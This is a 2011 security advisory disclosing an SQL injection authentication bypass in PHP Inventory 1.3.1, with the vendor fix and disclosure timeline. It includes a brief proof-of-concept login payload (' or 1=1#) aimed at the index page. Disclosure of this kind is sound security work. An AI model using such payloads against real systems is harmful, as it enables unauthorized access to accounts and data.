Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability Advisory ID: INFOSERVE-ADV2011-08 Author: Stefan Schurtz Contact: security@xxxxxxxxxxxx Affected Software: Successfully tested on PHP Inventory 1.3.1 Vendor URL: Vendor Status: fixed CVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597 ========================== Vulnerability Description ========================== PHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability ================== PoC-Exploit ================== http://[target]/php-inventory/index.php // with 'magic_quotes_gpc = Off' USER NAME = ' or 1=1# or USER NAME = admin PASSWORD = ' or 1=1# ========= Solution ========= Update to the latest version 1.3.2 ==================== Disclosure Timeline ==================== 29-Nov-2011 - informed vendor (contact form) 30-Nov-2011 - vendor fix ======== Credits ======== Vulnerabilitiy found and advisory written by the INFOSERVE security team. =========== References ===========